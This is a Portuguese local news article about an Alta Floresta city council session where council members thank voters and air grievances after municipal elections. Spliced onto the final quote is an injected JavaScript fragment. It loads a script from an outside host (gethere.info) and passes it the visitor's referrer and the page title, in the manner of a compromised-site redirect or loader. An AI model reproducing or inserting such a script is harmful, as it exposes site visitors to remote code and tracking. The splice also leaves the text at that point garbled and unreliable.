Capa / Em Destaque / Sessão na Câmara é marcada por agradecimentos e desabafos

Sessão na Câmara é marcada por agradecimentos e desabafos

camaraDionéia Martins

Na sessão ordinária desta terça-feira na Câmara Municipal de Alta Floresta, os discursos foram em torno nas eleições que ocorreram no domingo, 2. Os vereadores usaram a tribuna para agradecer os votos e parabenizar os candidatos eleitos e não eleitos.

O vereador Charles Miranda que foi eleito para o terceiro mandato, disse que a abstenção nas eleições é um reflexo da insatisfação da população com que está acontecendo em todo o país e que os vereadores como representantes tem que fazer algo para diminuir esse índice. No Brasil a abstenção foi de aproximadamente 17,58% do eleitorado e em Alta Floresta foi 25,07% de faltosos.

“Não é um problema individual de Alta Floresta o Brasil inteiro está muito descrente com a política muito chateado com a maneira que vem sendo feita a política, e nós mais uma vez podemos usar esse pleito pra refletir em cima disso, é um momento de reflexão muito importante, o Brasil tá pedindo socorro”, discursou Charles.

Na próxima legislatura serão 13 vereadores, sete foram reeleitos, um já esteve na casa e cinco vão estrear na vida pública. Rogério Colicchio não conseguiu se reeleger, mas disse que é um vitorioso por ter feito uma campanha limpa. “Mesmo não tendo sido eleito estou extremamente feliz, porque aqui a gente faz uma avaliação da nossa estratégia eleitoral, ela foi extremamente vitoriosa dentro daquilo que nós nos propusemos”, disse o vereador.

A coligação de Rogério não teve candidato a prefeito. Independe o grupo conseguiu eleger dois representantes, um do PT o biólogo e jornalista Mequiel Zacarias, e o outro do PPS, o vereador Dida Pires que se reelegeu. Dida disse que foram excluídos, mesmo assim os dois vereadores eleitos foi o terceiro e quarto mais votado.

“Fomos tratados como leprosos, algumas pessoas achavam que já tinham ganhado as eleições não quiseram o PPS e nem o PT, e eu sempre disse o PT pode ter a mancha lá em cima, mas aqui em baixo é pessoas de bem pessoas que contribuíram com o desenvolvimento do nosso município”, desabafou Dida.

Reeleita, Elisa Gomes cumprimentou os vereadores que foram eleitos e estavam no plenário, e sugeriu que eles estudem as leis municipais. “Quando fui eleita pela primeira vez, a primeira coisa que eu fiz foi vim aqui nessa casa de leis, pegar o regimento interno e a lei orgânica e estudar bem eles”, recomendou a vereadora.

O vereador Tuti disse que o povo reconheceu o trabalho e agradeceu o prefeito Asiel. Tuti justificou a perda de 409 votos ao fato de ter mais candidatos do que em 2012. “Eu quero agradecer aqui o prefeito Asiel que me deu oportunidade, me ajudou muito para eu ser novamente o mais votado, embora houve uma queda de 400 votos mas é normal, porque nós tivemos 33 candidatos a mais que a eleição passada, e todo mundo perdeu um pouco”, atestou o vereador.

Embora tenha ficado entre os 10 mais votados, o vereador Bernardo Patrício não alcançou a legenda e ficou de fora da próxima legislatura. “É uma derrota com sabor de vitória, levantei um projeto, uma bandeira, e levamos par rua essa bandeira, ousada, corajosa, do não financiamento de campanha, de ética, de moral, do novo para Alta Floresta”, ressaltou o vereador.

O vereador Paulinho Jiló também ficou fora da próxima legislatura, mas para eles todos que tiveram a coragem de ser candidato são vitoriosos. “O mais derrotado hoje numa campanha a vereança ou ao executivo, a pior derrota é aqueles que sonham em ser um prefeito, aquele que quer galgar uma cadeira na casa de leis e não tem a coragem de poder entrar na disputa, porque ser candidato hoje não é fácil”, disse.

Reeleito para o terceiro mandato Emerson Machado, parabenizou o prefeito Asiel Bezerra por ter vencido as eleições com a sua humildade e simplicidade. “A humildade venceu a arrogância”, disse o vereador, para em seguida fazer um desabafo. “Não estou querendo atirar pedra em ninguém, mas se fosse pra atirar eu também atirava, já atiraram tantas pedras em mim eu fiquei quietinho, tem problema nenhum isso, porque eu fui perseguido, de uma tal maneira, eu conseguir a minha reeleição na honesta. Eu sei o que eu passei, mas não sou vingativo, mas também não posso ser hipócrita”, falou Machado.

O reeleito vereador Mendonça parabenizou o presidente da Casa Eloi Crestani, para ele a Câmara foi moralizada. “Os demais presidentes moralizou essa casa, e a vossa pessoa moralizou mais ainda, estou feliz porque esta casa é uma casa de respeito, a sociedade provou isso nas urnas voltou quase todos, então significa que a câmara de vereadores não era tão ruim, senão não teria voltado ninguém”, desabafou o vereador.

O líder do prefeito na Câmara não conseguiu alcançar uma vaga no legislativo para os próximos 4 anos, devido ao engajamento na reeleição do prefeito Asiel que tem como vice Neia que é esposa do vereador. “A minha campanha eu posso culpar eu mesmo, eu abandonei a minha campanha e foquei na campanha do dr. Asiel, eu não fui pra rural, eu não fiz visitas, meu objetivo foi o dr. Asiel, e paguei caro a mim, mas a população de Alta Floresta ganhou e ganhou muito”, ressaltou Lau.

O presidente da casa de Leis, Eloi Crestani, agradeceu o apoio recebido da família e aos eleitores. “756 pessoas acreditaram em Eloi Crestani, sem demagogia, sem atacar ninguém, 4 anos não ataquei ninguém, muitas vezes fiquei calado pra não dá a resposta que muitas vezes a quem merecia, mas as pessoas conhece quem é quem”, disse Crestani.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top